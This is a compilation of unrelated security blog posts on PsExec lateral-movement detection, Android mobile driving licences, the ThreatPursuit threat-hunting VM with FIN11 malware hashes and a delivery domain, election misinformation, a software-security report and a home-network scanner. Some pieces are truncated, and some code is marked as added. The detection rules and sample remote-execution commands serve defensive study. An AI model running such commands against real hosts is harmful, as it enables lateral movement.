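    ("ADMIN-WS", r'PsExec.exe \\SRV01 -s ipconfig /all'),
]


def analyze(events):
    """Return (host, [rule names]) for every event that matches at least one rule."""
    staged = defaultdict(set)  # source host -> file names it staged into the temp dir
    findings = []
    for host, cmdline in events:
        hits = [name for name, rx in RULES.items() if rx.search(cmdline)]
        if PSEXEC.search(cmdline):
            copied, ran = STAGE.search(cmdline), RUN.search(cmdline)
            if copied:
                hits.append("psexec_stage_copy")
                staged[host].add(copied.group(1).lower())
            if ran:
                hits.append("psexec_detached_temp_exec")
                # Same file was staged earlier from this host: copy-then-run pair
                if ran.group(1).lower() in staged[host]:
                    hits.append("staged_then_executed")
        if hits:
            findings.append((host, hits))
    return findings


if __name__ == "__main__":
    for host, hits in analyze(SAMPLE_EVENTS):
        print(host, ", ".join(hits))
```

The single-event rules fire on legitimate bulk administration too, so the correlated staged_then_executed hit is the one to alert on; the others are better used as hunting leads.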

Privacy-preserving features in the Mobile Driving License

In the United States and other countries a Driver's License is not only used to convey driving privileges, it is also commonly used to prove identity or personal details.

Presenting a Driving License is simple, right? You hand over the card to the individual wishing to confirm your identity (the so-called “Relying Party” or “Verifier”); they check the security features of the plastic card (hologram, micro-printing, etc.) to ensure it’s not counterfeit; they check that it’s really your license, making sure you look like the portrait image printed on the card; and they read the data they’re interested in, typically your age, legal name, address etc. Finally, the verifier needs to hand back the plastic card.

Most people are so familiar with this process that they don’t think twice about it, or consider the privacy implications. In the following we’ll discuss how the new and soon-to-be-released ISO 18013-5 standard will improve on nearly every aspect of the process, and what it has to do with Android.

Mobile Driving License ISO Standard

The ISO 18013-5 “Mobile driving licence (mDL) application” standard has been written by a diverse group of people representing driving license issuers (e.g. state governments in the US), relying parties (federal and state governments, including law enforcement), academia, industry (including Google), and many others. This ISO standard allows for construction of Mobile Driving License (mDL) applications which users can carry in their phone and can use instead of the plastic card.

Instead of handing over your plastic card, you open the mDL application on your phone and press a button to share your mDL. The Verifier (aka “Relying Party”) has their own device with an mDL reader application and they either scan a QR code shown in your mDL app or do an NFC tap. The QR code (or NFC tap) conveys an ephemeral cryptographic public key and hardware address the mDL reader can connect to.

Once the mDL reader obtains the cryptographic key it creates its own ephemeral keypair and establishes an encrypted and authenticated, secure wireless channel (BLE, Wi-Fi Aware or NFC). The mDL reader uses this secure channel to request data, such as the portrait image or what kinds of vehicles you're allowed to drive, and can also use it to ask more abstract questions such as “is the holder older than 18?”

Crucially, the mDL application can ask the user to approve which data to release and may require the user to authenticate with fingerprint or face — none of which a passive plastic card could ever do.

With this explanation in mind, let’s see how presenting an mDL application compares with presenting a plastic-card driving license:

  • Your phone need not be handed to the verifier, unlike your plastic card. The first step, which requires closer contact to the Verifier to scan the QR code or tap the NFC reader, is safe from a data privacy point of view, and does not reveal any identifying information to the verifier. For additional protection, mDL apps will have the option of both requiring user authentication before releasing data and then immediately placing the phone in lockdown mode, to ensure that if the verifier takes the device they cannot easily get information from it.
  • All data is cryptographically signed by the Issuing Authority (for example the DMV who issued the mDL) and the verifier's app automatically validates the authenticity of the data transmitted by the mDL and refuses to display inauthentic data. This is far more secure than holograms and microprinting used in plastic cards where verification requires special training which most (human) verifiers don't receive. With most plastic cards, fake IDs are relatively easy to create, especially in an international context, putting everyone’s identity at risk.
  • The amount of data presented by the mDL is minimized — only data the user elects to release, either explicitly via prompts or implicitly via e.g. pre-approval and user settings, is released. This minimizes potential data abuse and increases the personal safety of users.

    For example, any bartender who checks your mDL for the sole purpose of verifying you’re old enough to buy a drink needs only a single piece of information, which is whether the holder is e.g. older than 21, yes or no. Compared to the plastic card, this is a huge improvement; a plastic card shows all your data even if the verifier doesn’t need it.

    Additionally, all of this information is available via a 2D barcode on the back, so if you use your plastic card driving license to buy beer, tobacco, or other restricted items at a store, it’s common in some states for the cashier to scan your license. In some cases, this means you may get advertising in the mail, but they may also sell your identifying information to the highest bidder or, worst case, leak their whole database.

These are some of the reasons why we think mDL is a big win for end users in terms of privacy.
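
Issuer signing and data minimization work together because, in ISO 18013-5, the issuer signs a list of salted digests (one per data element) rather than the elements themselves, so the holder can release any subset and the reader can still check each released element. The Python sketch below is an added example, not code from the original post or the Identity Credential API; JSON stands in for the standard's CBOR encoding, an HMAC stands in for the issuer's public-key signature so that it runs on the standard library alone, and the element values are constructed.

```python
import hashlib
import hmac
import json
import secrets

# Stand-in for the issuer's signing key. A real mDL uses an issuer public-key
# signature, so the reader would hold only the issuer's certificate.
ISSUER_KEY = secrets.token_bytes(32)

# Constructed sample data using mDL-style element names.
SAMPLE_ELEMENTS = {
    "family_name": "Doe",
    "given_name": "Jane",
    "birth_date": "1990-01-01",
    "resident_address": "123 Example St",
    "age_over_21": True,
}


def canon(obj):
    """Deterministic byte encoding (simplification: JSON instead of CBOR)."""
    return json.dumps(obj, sort_keys=True, separators=(",", ":")).encode()


def issue(elements, key):
    """Issuer: salt and hash every element, then sign only the digest list."""
    items, digests = {}, {}
    for digest_id, name in enumerate(sorted(elements)):
        # The random salt stops a reader from guessing an unreleased,
        # low-entropy value (such as a birth date) by hashing candidates.
        item = {"digestID": digest_id, "random": secrets.token_hex(16),
                "elementIdentifier": name, "elementValue": elements[name]}
        items[name] = item
        digests[str(digest_id)] = hashlib.sha256(canon(item)).hexdigest()
    mso = {"digestAlgorithm": "SHA-256", "valueDigests": digests}
    signature = hmac.new(key, canon(mso), hashlib.sha256).hexdigest()
    return {"items": items, "mso": mso, "signature": signature}


def present(credential, requested, approved):
    """Holder: release only elements that were requested AND approved by the user."""
    names = [n for n in requested if n in approved and n in credential["items"]]
    return {"mso": credential["mso"], "signature": credential["signature"],
            "items": [credential["items"][n] for n in names]}


def verify(presentation, key):
    """Reader: check the signature on the digest list, then every released item."""
    expected = hmac.new(key, canon(presentation["mso"]), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(expected, presentation["signature"]):
        raise ValueError("issuer signature invalid")
    verified = {}
    for item in presentation["items"]:
        signed = presentation["mso"]["valueDigests"].get(str(item["digestID"]))
        if signed != hashlib.sha256(canon(item)).hexdigest():
            raise ValueError("element %r does not match its signed digest"
                             % item["elementIdentifier"])
        verified[item["elementIdentifier"]] = item["elementValue"]
    return verified


if __name__ == "__main__":
    credential = issue(SAMPLE_ELEMENTS, ISSUER_KEY)
    # The reader asks for three elements; the user approves only the age check.
    shown = present(credential, ["age_over_21", "family_name", "birth_date"],
                    approved={"age_over_21"})
    print(verify(shown, ISSUER_KEY))
```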

One commonality between plastic-card driving licences and the mDL is how the relying party verifies that the person presenting the license is the authorized holder. In both cases, the verifier manually compares the appearance of the individual against a portrait photo, either printed on the plastic or transmitted electronically. Research has shown that it’s hard for individuals to match strangers to portrait images.

The initial version of ISO 18013-5 won’t improve on this but the ISO committee working on the standard is already investigating ways to utilize on-device biometrics sensors to perform this match in a secure and privacy-protecting way. The hope is that improved fidelity in the process helps reduce unauthorized use of identity documents.

mDL support in Android

Through facilities such as hardware-based Keystore, Android already offers excellent support for security and privacy-sensitive applications and in fact it’s already possible to implement the ISO 18013-5 standard on Android without further platform changes. Many organizations participating in the ISO committee have already implemented 18013-5 Android apps.

That said, with purpose-built support in the operating system it is possible to provide better security and privacy properties. Android 11 includes the Identity Credential APIs at the Framework level along with a Hardware Abstraction Layer interface which can be implemented by Android OEMs to enable identity credential support in Secure Hardware. Using the Identity Credential API, the Trusted Computing Base of mDL applications does not include the application or even Android itself. This will be particularly important for future versions where the verifier must trust the device to identify and authenticate the user, for example through fingerprint or face matching on the holder's own device. It’s likely such a solution will require certified hardware and/or software and certification is not practical if the TCB includes the hundreds of millions of lines of code in Android and the Linux kernel.

One advantage of plastic cards is that they don't require power or network communication to be useful. Putting all your licenses on your phone could seem inconvenient in cases where your device is low on battery, or does not have enough battery life to start. The Android Identity Credential HAL therefore provides support for a mode called Direct Access, where the license is still available through an NFC tap even when the phone's battery is too low to boot it up. Device makers can implement this mode, but it will require hardware support that will take several years to roll out.

For devices without the Identity Credential HAL, we have an Android Jetpack which implements the same API and works on nearly every Android device in the world (API level 24 or later). If the device has hardware-backed Identity Credential support then this Jetpack simply forwards calls to the platform API. Otherwise, an Android Keystore-backed implementation will be used. While the Android Keystore-backed implementation does not provide the same level of security and privacy, it is perfectly adequate for both holders and issuers in cases where all data is issuer-signed. Because of this, the Jetpack is the preferred way to use the Identity Credential APIs. We also made available sample open-source mDL and mDL Reader applications using the Identity Credential APIs.

Conclusion

Android now includes APIs for managing and presenting identity documents in a more secure and privacy-focused way than was previously possible. These can be used to implement ISO 18013-5 mDLs but the APIs are generic enough to be usable for other kinds of electronic documents, from school ID or bonus program club cards to passports.

Additionally, the Android Security and Privacy team actively participates in the ISO committees where these standards are written and also works with civil liberties groups to ensure it has a positive impact on our end users.

Welcome to ThreatPursuit VM: A Threat Intelligence and Hunting Virtual Machine

Skilled adversaries can deceive detection and often employ new measures in their tradecraft. Keeping a stringent focus on the lifecycle and evolution of adversaries allows analysts to devise new detection mechanisms and response processes. Access to the appropriate tooling and resources is critical to discover these threats in a timely and accurate manner. Therefore, we are actively compiling the most essential software packages into a Windows-based distribution: ThreatPursuit VM.

ThreatPursuit Virtual Machine (VM) is a fully customizable, open-sourced Windows-based distribution focused on threat intelligence analysis and hunting designed for intel and malware analysts as well as threat hunters to get up and running quickly. The threat intelligence analyst role is a subset and specialized member of the blue team. Individuals in this role generally have a strong impetus for knowing the threat environment. Often their traits, skills and experiences will vary depending on training and subject matter expertise.

Their expertise may not be technical and may include experiences and tradecraft earned by operating within a different domain (e.g., geospatial, criminal, signals intelligence, etc.). A key aspect of the role may include the requirement to hunt, study and triage previously undiscovered or recently emerging threats by discerning data for evil. Threat analysts apply a variety of structured analytical methods in order to develop meaningful and relevant products for their customers.

With this distribution we aim to enable users to:

  • Conduct hunting activities or missions
  • Create adversarial playbooks using evidence-based knowledge
  • Develop and apply a range of analytical products amongst datasets
  • Perform analytical pivoting across forensic artifacts and elements
  • Emulate advanced offensive security tradecraft
  • Enable situational awareness through intelligence sharing and reporting
  • Apply data science techniques and visualize clusters of symbolic data
  • Leverage open intelligence sources to provide unique insights for defense and offense

Akin to both FLARE-VM and Commando VM, ThreatPursuit VM uses Boxstarter, Chocolatey and MyGet packages to install software that facilitates the many aspects related to roles performed by analysts. The tools installed provide easy access to a broad range of tooling, including, but not limited to, threat analytics, statistics, visualisation, threat hunting, malware triage, adversarial emulation, and threat modelling. Here are some of the tools, but there are many more:

For a full list of tools, please visit our GitHub repository.

Installation

Similar to FLARE-VM and Commando VM, it's recommended to install ThreatPursuit VM in a virtual machine. The following is an overview of the minimal and recommended installation requirements.

Requirements

  • Windows 10 1903 or greater
  • 60 GB Hard Drive
  • 4 GB RAM

Recommended

  • Windows 10 1903
  • 80+ GB Hard Drive
  • 6+ GB RAM
  • 1 network adapter
  • OpenGL Graphics Card 1024 MB
  • Enable Virtualization support for VM
    • Required for Docker (MISP, OpenCTI)

Standard Install

The easiest way to install ThreatPursuit VM is to use the following steps. This will install all the default tools and get you finding evil in no time!

  1. Create and configure a new Windows 10 VM with the aforementioned requirements.
    • Ensure VM is updated completely. You may need to check for updates, reboot and check again until no more remain.
  2. Install your specific VM guest tools (e.g., VMware Tools) to allow additional features such as copy/paste and screen resizing.
  3. Take a snapshot of your machine! This allows you to always have a clean state.
  4. Download and copy install.ps1 to your newly configured VM.
  5. Open PowerShell as an administrator.

Next, unblock the install file by running: Unblock-File .\install.ps1, as seen in Figure 1.


Figure 1: Unblock-File installation script

Enable script execution by running: Set-ExecutionPolicy Unrestricted -f, as seen in Figure 2.


Figure 2: Set-ExecutionPolicy Unrestricted -f script

Finally, execute the installer script as follows: .\install.ps1

After executing install.ps1, you’ll be prompted for the administrator password in order to automate host restarts during installation as several reboots occur. Optionally, you may pass your password as a command-line argument via ".\install.ps1 -password <password>". If you do not have a password set, hitting enter when prompted will also work.

This will be the last thing you will need to do before the installation is unattended. The script will set up the Boxstarter environment and proceed to download and install the ThreatPursuit VM environment, as seen in Figure 3.


Figure 3: Installation script execution

The installation process may take upwards of several hours depending on your internet connection speed and the web servers hosting the various files. You will know the install is finished when the VM's logo is placed on the background. Figure 4 shows the post-installation desktop environment, featuring the logo and a desktop shortcut.


Figure 4: ThreatPursuit VM desktop installed

Custom Install

Is the standard installation too much for you? We provide a custom installation method that allows you to choose which chocolatey packages get installed. For additional details, see the Custom Install steps at our GitHub repository.

Installing Additional Packages

Since ThreatPursuit VM uses the Chocolatey Windows package manager, it's easy to install additional packages not included by default. For example, entering the command cinst github as administrator installs GitHub Desktop on your system.

To update all currently installed packages to their most recent versions, run the command cup all as administrator.

Getting Started: A Use Case

As threat analysts, what we choose to pursue will depend on the priorities and requirements of our current role. Often, they vary with each threat or adversary encountered such as financial crime, espionage, issue-motivated groups or individuals. The role broadly encompasses the collection and analysis of threat data (e.g., malware, indicators of attack/compromise) with the goal of triaging the data and developing actionable intelligence. For example, one may want to produce detection signatures based on malware network communications to classify, share or disseminate indicators of compromise (IOCs) in standardized ways. We may also use these IOCs in order to develop and apply analytical products that establish clusters of analogous nodes such as MITRE ATT&CK tactics and techniques, or APT groups. On the other hand, our goal can be as simple as triaging a malware sample behavior, hunting for indicators, or proving or disproving a hypothesis. Let's look at how we might start.

Open Hunting

To start our use case, let’s say we are interested in reviewing the latest threat actor activity reported for the quarter. We sign in to the Mandiant Advantage portal (Figure 5) using our public subscription to get a snapshot view of any highlighted activity (Figure 6).


Figure 5: Mandiant Advantage portal


Figure 6: Actor activity for Q3 2020

Based on the Mandiant Advantage report, we notice a number of highly active APT and FIN actors. We choose to drill in to one of these actors by hovering our mouse and selecting the actor tag FIN11.

We receive a high-level snapshot summary view of the threat actor, their targeted industry verticals, associated reports and much more, as seen in Figure 7. We also may choose to select the most recent report associated with FIN11 for review.


Figure 7: FIN11 actor summary

By selecting the “View Full Page” button as seen at the top right corner of Figure 6, we can use the feature to download indicators, as seen in the top right corner of Figure 8.


Figure 8: Full FIN11 page

Within the FIN11 report, we review the associated threat intelligence tags that contain finished intelligence products. However, we are interested in the collection of raw IOCs (Figure 9) that we could leverage to pivot off or enrich our own datasets.


Figure 9: Downloaded FIN11 indicators

Using the Malware Information Sharing Platform (MISP) as our collection point, we are going to upload and triage our indicators using our local MISP instance running on ThreatPursuit VM.

Please note you will need to ensure your local MISP instance is running correctly with the configuration of your choosing. We select the “Add Event” button, begin populating all needed fields to prepare our import, and then click “Submit”, as shown in Figure 10.


Figure 10: MISP triage of events

Under the tags section of our newly created FIN11 event, we apply relevant tags to begin associating aspects of contextual information related to our target, as seen in Figure 11.


Figure 11: MISP Event setup for FIN11

We then select “Add Attribute” into our event, which will allow us to import our MD5 hashes into the MISP galaxy, as seen in Figure 12. Using both the category and type, we select the appropriate values that best represent our dataset and prepare to submit that data into our event.


Figure 12: MISP import events into FIN11 event

MISP allows for a streamlined way to drill and tag indicators as well as enrich and pivot with threat intelligence. We can also choose to perform this enrichment process within MISP using a variety of open intelligence sources and their modules, such as Mandiant Advantage, PassiveTotal, Shodan and VirusTotal. We can also achieve the same result using similar tools already packaged in ThreatPursuit VM.
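
Choosing the category and type for each value can be scripted before the import. The Python sketch below is an added example, not part of the original post or of MISP's own tooling; it assumes MISP's standard `md5`, `filename|md5` and `domain` attribute types, uses indicators quoted in this walkthrough as input, and adds one truncated hash constructed to show rejection. The function names are hypothetical.

```python
import re

MD5 = re.compile(r'^[0-9a-f]{32}$', re.I)
DOMAIN = re.compile(
    r'^(?=.{1,253}$)(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)+[a-z]{2,63}$', re.I)

# Indicators quoted in this walkthrough, plus two constructed entries.
RAW_INDICATORS = [
    "113dd1e3caa47b5a6438069b15127707",
    "MONITIORING REPORT.xls|5d7d2371668ad4a6484f76b0b6511961",
    "3c43d080b5badfdde7aff732c066d1b2",
    "3C43D080B5BADFDDE7AFF732C066D1B2",   # constructed: upper-case duplicate
    "near-fast[.]com",
    "113dd1e3caa47b5a6438069b1512770",    # constructed: truncated to 31 characters
]


def refang(value):
    """Undo the [.] defanging used in reports so the value can be validated."""
    return value.strip().replace("[.]", ".")


def attribute(attr_type, category, value):
    """One attribute in the field layout MISP uses for event attributes."""
    return {"type": attr_type, "category": category, "value": value, "to_ids": True}


def to_attribute(raw):
    """Map a raw indicator to an attribute dict, or None if it is not recognised."""
    value = refang(raw)
    if "|" in value:
        name, _, digest = value.rpartition("|")
        if name and MD5.match(digest):
            return attribute("filename|md5", "Payload delivery",
                             "%s|%s" % (name, digest.lower()))
        return None
    if MD5.match(value):
        return attribute("md5", "Payload delivery", value.lower())
    if DOMAIN.match(value):
        return attribute("domain", "Network activity", value.lower())
    return None


def build_attributes(raw_indicators):
    """Validate, normalise and de-duplicate; return (attributes, rejected inputs)."""
    seen, attributes, rejected = set(), [], []
    for raw in raw_indicators:
        attr = to_attribute(raw)
        if attr is None:
            rejected.append(raw)
            continue
        key = (attr["type"], attr["value"])
        if key not in seen:
            seen.add(key)
            attributes.append(attr)
    return attributes, rejected


if __name__ == "__main__":
    attrs, bad = build_attributes(RAW_INDICATORS)
    for a in attrs:
        print(a["category"], a["type"], a["value"])
    print("rejected:", bad)
```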

Using Maltego CE, installed as part of the VM, we can automate aspects of targeted collection and analysis of our FIN11 malware families and associated infrastructure. The following are just some of the Maltego plugins that can be configured post installation to help with the enrichment and collection process:

Targeting the suspected payload, we attempt to pivot using its MD5 hash value (113dd1e3caa47b5a6438069b15127707) to discover additional artifacts, such as infrastructure, domain record history, previously triaged reports, similar malware samples, timestamps, and the rich headers.

Importing our hash into Maltego CE, we can proceed to perform a range of queries to hunt and retrieve interesting information related to our FIN11 malware, as seen in Figure 13.


Figure 13: Maltego CE querying MD5 hash

Quite quickly we pull back indicators; in this case, generic named detection signatures from a range of anti-malware vendors. Using VirusTotalAPI Public, we perform a series of collection and triage queries across a variety of configured open sources, as shown in Figure 14.


Figure 14: Automating enrichment and analysis of targeted infrastructure

A visual link has been made public for quick reference.  

With our newly identified information obtained by passively scraping those IOCs from a variety of data providers, we can identify additional hashes, delivery URLs and web command and control locations, as shown in Figure 15.


Figure 15: Maltego visualization of FIN11 dropper

Pivoting on the suspected FIN11 delivery domain near-fast[.]com, we have found several more samples that were uploaded to an online malware sandbox website AppAnyRun. Within the ThreatPursuit VM Google Chrome browser and in the Tools directory, there are shortcuts and bookmarks to a range of sandboxes to help with accessing and searching them quickly. We can use AppAnyRun to further analyze the heterogeneous networks and execution behaviors of these acquired samples.

We have identified another similar sample, which is an XLS document named “MONITIORING REPORT.xls” with the MD5 hash 5d7d2371668ad4a6484f76b0b6511961 (Figure 16). Let’s attempt to triage this newly discovered sample and qualify the relationship back to FIN11.


Figure 16: VirusTotal execution report of 5d7d2371668ad4a6484f76b0b6511961

Extracting interesting strings and indicators from this sample allows us to compare these artifacts against our own dynamic analysis. If we can’t access the original malware sample, but we have other indicators to hunt with, we could also pivot on various unique characteristics and attributes (e.g., imphash, vthash, pdb string, etc...) to discover related samples.

Even without access to the sample, we can also use YARA to mine for similar malware samples. One such source to mine is using the mquery tool and their datasets offered via CERT.PL. To fast track the creation of a YARA rule, we leverage the FIN11 YARA rule provided within the FIN11 Mandiant Advantage report. Simply copy and paste the YARA rule into mquery page and select “Query” to perform the search (Figure 17). It may take some time, so be sure to check back later (here are the results).


Figure 17: mquery YARA rule hunting search for FIN11 malware

Within our mquery search, we find a generic signature hit on Win32_Spoonbeard_1_beta for the MD5 hash 3c43d080b5badfdde7aff732c066d1b2. We associate this MD5 hash with another sandbox, app.any.run, at the following URL:

  • https://app.any.run/tasks/19ac204b-9381-4127-a5ac-d6b68e0ee92c/

As seen in Figure 18, this sample was first uploaded on May 2, 2019, with an associated infection chain intact.

Figure 18: AppAnyRun Execution Report on 3c43d080b5badfdde7aff732c066d1b2

We now have a confident signature hit, but with different named detections on the malware family. This is a common challenge for threat analysts and researchers. However, we have gained interesting information about the malware itself such as its execution behavior, encryption methods, dropped files, timelines and command and control server and beacon information. This is more than enough for us to pivot across our own datasets to hunt for previously seen activities and prepare to finalize our report.

Once we are confident in our analysis, we can start to model and attribute the malware characteristics. We can leverage other threat exchange communities and intelligence sources to further enrich the information we collected on the sample. Enrichment allows analysts to better extrapolate context such as timings, malware similarity, associated infrastructures, and prior targeting information. We will briefly add our content into our MISP instance and apply tags to finalize our review.

We may wish to add MITRE ATT&CK tags (Figure 19) relevant across the malware infection chain for our sample as they could be useful from a modelling standpoint.


Figure 19: MITRE ATT&CK tags for the malware sample

Final Thoughts

We hope you enjoyed this basic malware triage workflow use case using ThreatPursuit VM. The included toolset has many more tools and capabilities, such as machine learning (ML) algorithms, that also assist threat hunters by analyzing large volumes of data quickly. Check out some of FireEye’s ML blog posts here.

For a complete list of tools please see the ThreatPursuit VM GitHub repository. We look forward to releasing more blog posts, content and playbooks as our user base grows.

CyberWeek: Working Together to Improve Cybersecurity

The annual CyberWeek festival, hosted by CyberScoop, brings together people and organizations within the cybersecurity community, as well as C-suite leaders from technology-based industry, academia, and government, for the purpose of exchanging information, sharing best practices and discussing how to protect against and overcome cyberthreats facing the nation. This year, the event turned digital and provided a multitude of virtual conferences and seminars for attendees over the course of a week, from October 19 to October 23. The Technology Partnerships Office (TPO) at NIST attended this

Election 2020: Lookout for Fake News Before and After the Election


Election 2020: Keep on the Lookout for Fake News Before and After the Election

As the news and conversations leading up to Election Day intensify, and with early voting already in full swing, the flood of misinformation and outright disinformation online continues—and will undoubtedly continue in the days after as the results are tabulated and announced.

Perhaps you’ve seen some instances of it yourself. For instance, one recent news story reported that numerous legitimate social media accounts have shared misinformation about the vote. An example: photos of old, empty election envelopes that were properly disposed of after the 2018 election, used to make the false claim that they were uncounted votes from the 2020 election. It’d be naïve for us to think that postings like this, and others, would suddenly come to a halt on Election Day.

We can expect election misinformation to continue even after Election Day

I touched upon this topic in my earlier blog about how misinformation online can undermine our election, yet it’s worth underscoring once again. It’s easy for our attention to focus on the days leading up to the election. However, this election stands to be like few others, as the high volume of mail-in ballots may keep us from knowing who the certified victor is for possibly weeks after Election Day.
How that timeline plays out in practice remains to be seen, yet we should all prepare ourselves for a glut of continued misinformation and disinformation that aims to cloud the process. Feeds will get filled with it, and it’ll be up to us to make sense of what’s true and what’s false out there.

Who is fact checking posts on social media sites?

Sadly, much of the onus for fact-checking will fall on us, particularly when 55% of Americans say they “often” or “sometimes” get their news via social media. There are a few reasons why:

• First, social media platforms are new to fact-checking and their processes are still developing, particularly around the transparency of their fact-checking methodology;
• Secondly, corporate leadership of the two major social media platforms have stated differing views about fact checking on their platforms;
• And third, the sheer volume of posts that these platforms pump out in any given day (or minute!) makes it difficult to fact-check posts at scale.

Where does that leave us? In unprecedented times.

Historically, we’ve always had to be savvy consumers of news, where a balanced diet of media consumption allowed us to develop a clearer picture of events. Yet now, in a time of unfiltered social media, news comes to us from a multitude of publishers, bloggers, and individuals. And within that mix, it’s difficult to immediately know who the editorial teams behind those stories are—what their intentions, credentials, and leanings are—and if they’re drawing their information from bona fide, verified sources. The result is that we must read and view everything today with an increased level of healthy skepticism.

Fact-checking your news

That takes work, yet my recent blog on How to Spot Fake News and Misinformation in Your Social Media Feed offers you a leg up with several pointers to help you sniff out potential falsehoods.
In addition, here’s a short list of fact-checking resources that you can turn to when something questionable comes up in your feed. Likewise, they make for good browsing even if you don’t have a specific story that you want to check up on. You can keep these handy:

• PolitiFact from the Poynter Institute
• FactCheck.org from the Annenberg Public Policy Center
• AP News Fact Check from the Associated Press
• Reuters Fact Check from Reuters News
• Snopes.com from Snopes Media Group

Stay vigilant

With the election just days away and a result that may not be declared at the end of Election Day, we all need to scrutinize the news that presents itself to us, particularly on social media. Fact-checking what you see and read, along with cross-referencing it with multiple, reputable sources, will help you get the best information possible—which is absolutely vital when it comes time to cast your ballot.


The post Election 2020: Lookout for Fake News Before and After the Election appeared first on McAfee Blogs.

Announcing the 11th Volume of Our State of Software Security Report

Today, we released the 11th volume of our annual State of Software Security (SOSS) report. This report, based on our scan results, always offers an abundance of insights and information about software vulnerabilities: what they are, what’s causing them, and how to address them most effectively. This year is no different.

With last year’s SOSS Volume 10, we spent some time looking at how much things had changed in the decade spanning Volume 1 to Volume 10. With Volume 11, we are going to look forward and consider the direction software development is headed. We are not trying to decide if we are doing better or worse than before, but looking at what kind of impact the decisions developers make have on software security.

Some key takeaways:

Most applications are vulnerable. Our analysis this year found that among 130,000 apps, 76 percent had at least one security flaw. But in the good news department, most apps do not have severe vulnerabilities. Only 24 percent had high-severity security flaws. Back to the bad news: fix rate is still an issue, as half of security findings are still open 6 months after discovery.

Open source code is expanding the attack surface. Applications increasingly include open source libraries; in fact, many now include more open source than first-party code. This year, we found that 97 percent of a typical Java application is made up of third-party code. And when we looked at our analysis of open source code through Software Composition Analysis vs. first-party code through Static Analysis, we found that almost one-third of all applications have more findings in third-party libraries than in the native code base.

There are ways to “nurture” software security, even if the “nature” of your software is less than ideal. This year, we thought about what leads to the state of software security: is it “nature” or “nurture”? Is it the attributes of the app that the developer inherits (its security debt, its size), or is it the actions of the developers (how frequently they are scanning for security, or how security is integrated into their processes)? And if it’s “nature,” is there anything developers or security pros can do to improve security outcomes? This year’s research unearthed some surprising, and promising, data surrounding ways to “nurture” the security of your applications, even if the “nature” is less than ideal. For example, those who scan via API (and therefore are integrating and automating security testing) shorten the time to address half their flaws by 17.5 days.

See below for the data highlights, and check out the full report for all the data details, plus our advice on how to use the story told by the numbers to improve your own application security program.

Trend Micro HouseCall for Home Networks: Giving You a Free Hand in Home Network Security

Remember when only desktop computers in our homes had connections to the internet? Thanks to the latest developments in smart device technology, almost everything now can be connected: security cameras, smart TVs, gaming consoles, and network storage, to name just a few. While a home network provides lots of benefits, it can also expose us to safety and privacy risks.

But checking for those risks need not be costly. How about a network security checker available for free? Yes, you read that right. Trend Micro’s free Housecall for Home Networks (HCHN) scans the connected devices in your home network and detects those that pose security risks. And in doing so, it gives you a sense for what real network security entails. We have a solution for that also.

Want to know more?

Trend Micro HCHN uses intelligent network scanning technology to scan the devices connected to your home network for vulnerabilities. These can range from a low risk type—such as an easily identifiable Wi-Fi Name that hackers can use to attack your router and home network—to high risk types, such as SSL-Poodle (for man-in-the-middle attacks), Shellshock (for remote code execution attacks), Heartbleed (which puts website passwords at risk) and WannaCry (which is a Windows ransomware cryptoworm). These and other vulnerabilities can be detected through the help of this handy tool.

In addition, HCHN checks devices for open ports that are commonly targeted by hackers and malware and can be exploited for cybercriminal activities. Examples include ports 20 and 21, used via the File Transfer Protocol (FTP) to transfer files between an FTP client (20) and FTP server (21), which can expose a multitude of vulnerabilities to the internet; and port 23, which sends data in clear text, allowing attackers to listen in, watch for credentials, or inject commands, and so perform remote code execution.

Moreover, HCHN gives you a report about the status of your home network and its connected devices and offers helpful advice for keeping your network and devices secure.

Lastly, HCHN notifies you when:

  • A new device joins the network
  • You connect to a new network
  • A new vulnerability is found in the network.

Ready to install?

HCHN is easy to use and accessible from any device, be it Windows (7, 8 and 10), MacOS (10.12 or later), Android (5.0 or later) or iOS (8.0 or later). For your computer hardware, you just need an Intel Pentium or compatible processor, 256MB of RAM (512MB recommended), and at least 50MB of available disk space, and you’re set.

  • Download and install the application from the Web, Google Play Store or Apple App Store.
  • During install, accept the Privacy and Personal Data Collection Disclosure Agreement which indicates the necessary information gathered in order to check for and identify vulnerabilities in devices connected to your home network and you’re good to go.
  • Once installed, inspect your home network’s security risk exposure by clicking (applies to Windows and MacOS) or tapping (applies to Android and iOS) Scan Now. You’re then presented with the result.

 

Are my home network and connected devices safe?

Here are a few scans we did: first from a Windows PC, then from Android and iOS devices.

When the scan is complete on a Windows computer it shows two tabs: Home Network and Devices.

The first tab indicates a snapshot of your home network, identifying the devices at risk.

Figure 1. HouseCall for Home Networks – Home Network

The second tab indicates a list of the devices scanned and the details of any device risks found.

Figure 2. HouseCall for Home Networks – Device List

On the Android device, once the scan has finished, the screen will reveal any security risks detected. You can view the issue to see more details of the security risk in your home network. You can then slide to the next panel and check to verify all the connected devices on your network.

Figure 3. HCHN – At Risk Devices

Similarly, upon completing the network scan from an iOS device, the app will display the risk that needs your attention. Just as with the Android device, you can move to the next panel to review the list of connected devices that were identified by Trend Micro HCHN.

Figure 4. HCHN – Needs Attention

A Few Reminders and Recommendations …

  • Use HCHN regularly to check the posture of your home network security, since new vulnerabilities and network risks may appear in the device after a time due to lack of firmware updates or a failure by the manufacturer to address a newfound risk.
  • Ensure that the devices (including mobile devices such as phones or tablets) are on and connected to the network when a scan is performed.
  • Some security products installed on the device initiating the network scan might detect the scan as suspicious and show a warning message or block user access. This doesn’t mean that HCHN is a malicious application. Add HCHN to your security product’s exception list, so it’s allowed to examine your network and connected devices for security risks.
  • The HCHN app does not automatically block dangerous network traffic or suspicious devices from connecting to your network. For that, and more home network security features, you should increase your home’s network protection with Trend Micro Home Network Security. To that we now turn.

What Home Network Security Provides

While a free network scan helps to determine the underlying dangers in your home network, to fully protect not only your home network but your family, you should consider Trend Micro Home Network Security (HNS) as a permanent enhancement to your network. It can shield your home against a wide variety of threats, including network intrusions, risky remote connections, phishing, ransomware, harmful websites and dangerous downloads. Additional features include the following:

  • New Device Approval gives you control over the devices that are allowed access to your home network.
  • Remote Access Protection limits malicious individuals from using remote desktop programs to connect to your devices at home.
  • Voice Control lets you issue voice commands to Alexa or Google Home to perform specific functions on HNS such as conducting a scan, obtaining your home network’s security status, pausing internet usage, disabling internet access for a user, and so on.
  • Parental Controls’ flexible and intuitive feature set, comprised of Filtering, Inappropriate App Used, Time Limits and Connection Alerts, can help any parent to provide a safe and secure internet experience for their kids. Combined with Trend Micro Guardian, parents can extend these protections to any network their children connect to, Wi-Fi or cellular.

